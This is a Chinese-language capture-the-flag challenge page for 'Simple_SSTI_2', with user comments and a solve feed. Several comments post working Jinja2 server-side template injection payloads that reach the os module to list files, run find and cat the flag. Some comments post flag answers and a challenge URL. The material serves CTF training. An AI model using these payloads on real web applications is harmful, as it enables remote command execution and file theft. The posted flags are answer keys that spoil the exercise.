Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16188
提  示:
描  述:
Simple_SSTI_2
评论
2280443298 1年前

{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}

回复 1

zhenbuhuiweb 1年前

flag{d15e0ca95ddb50b992109b24c82cfe5a}

回复 0

ssln 1年前

114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令

回复 0

210470qq 1年前

flag{43b52fa732d6f8ccbfacea9e989ac07b}

回复 0

songci 1年前

ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""

回复 1

Mirabelle 1年前

?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

回复 4

ZeronKR1212 2年前

怎么做啊,哥哥们

回复 0

kimizu 2年前

SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}

回复 3

3347665154 2年前

flag{a0a8ab35c083003f4bb44c7920b69bd1}

回复 0

jinyuxin 2年前

flag{3da091678f181776084413b87192ea57}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

白菜白又白 攻破了该题 17分钟前
igrazee 攻破了该题 4小时前
yangwen 攻破了该题 18小时前
ixin 攻破了该题 19小时前
66666ctfxr 攻破了该题 1天前
Zhengzanmei 攻破了该题 1天前
liang123456 攻破了该题 1天前
353866147 攻破了该题 2天前
out不慢 攻破了该题 3天前
sjjf 攻破了该题 5天前
所以flag在哪? 攻破了该题 7天前
18934929166 攻破了该题 7天前
zxcvbnmzhang 攻破了该题 7天前
辛笙 攻破了该题 10天前
caocao 攻破了该题 11天前
Hushhh 攻破了该题 11天前
Jazz888 攻破了该题 11天前
一世温华 攻破了该题 12天前
zzt1 攻破了该题 13天前
南交混的入朱靖宇 攻破了该题 14天前
问题反馈